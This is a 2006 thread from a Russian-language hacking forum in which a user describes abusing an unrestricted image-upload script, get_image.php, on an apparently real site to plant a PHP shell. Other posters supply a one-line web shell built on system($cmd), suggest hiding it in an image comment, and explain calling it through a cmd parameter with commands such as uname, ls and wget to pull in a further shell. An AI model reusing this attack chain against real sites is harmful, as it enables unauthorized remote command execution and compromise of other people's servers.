Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Зальем файлы на сайт через get_image.php (https://forum.antichat.xyz/showthread.php?t=18765)

djhoof 07.05.2006 23:07

Зальем файлы на сайт через get_image.php
 
На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..

Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.

Все файлы появляются в папке /www.site.ru/img/

Какие есть варианты? :)

djhoof 07.05.2006 23:49

залил.
После нажати я на кнопку добавить как и обычно вылелтел адресок куда все зелетело.
Выдалось http://..ru/img/1147031229.jpg
Нажимаю ничего не происходит..хотя через Ie он выдает текст shella
Что мне с ним делать?

djhoof 08.05.2006 00:20

Вот по хорошему его как нить залить в другую папку..через этот get_image.php
Какие мысли еще, народ?

djhoof 08.05.2006 00:32

Если нужно то могу этот исходничек get_image.php осветить.

alex-19841 08.05.2006 03:03

Попробуй
http://site.ru/index.php?cmd="php shell.jpg"

djhoof 08.05.2006 11:54

Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!

А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..

KaMiKadZe 08.05.2006 12:40

Цитата:

Сообщение от djhoof
Люди тут еще советуют:
Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!

А можно поподробнее, на счет залит эту команду..да и вообще сам процес что-то не пойму..

Это я предлогал но моё сообщение пропало куда то(
Вообщем команды там будут типа http://site.ru/img/fail.php?cmd= и тут команда типа uname -a воть а залить моно так ls -la

Zitt 08.05.2006 13:02

Цитата:

а залить моно так ls -la
Ета команда показывает файлы в дире. А залить попробуй через "wget сцылка" но ето тока в том случае если есть права на запись

djhoof 08.05.2006 13:11

К сожалению или к счастью у меня нет огромного опыта в этих делах..дабы поэтому и спрашивал.
Можно мне написать подробно на счет fail.php?cmd=...(так как пока мне не покажешь..черт побери я так и не пойму..)
Заранее благодарен.
Я хотел бы научится, да вот только не знаю что да где..

Zitt 08.05.2006 13:31

djhoof статей по етомe поводу уйма почитай немного!!!
Цитата:

Можно мне написать подробно на счет fail.php?cmd=...
Куда уж подробней заливаеш пхп файл с ети <? system($cmd); ?> сожержимым допустим тот же fall.php. Дальше http://site.ru/img/fail.php?cmd=команда


Время: 05:50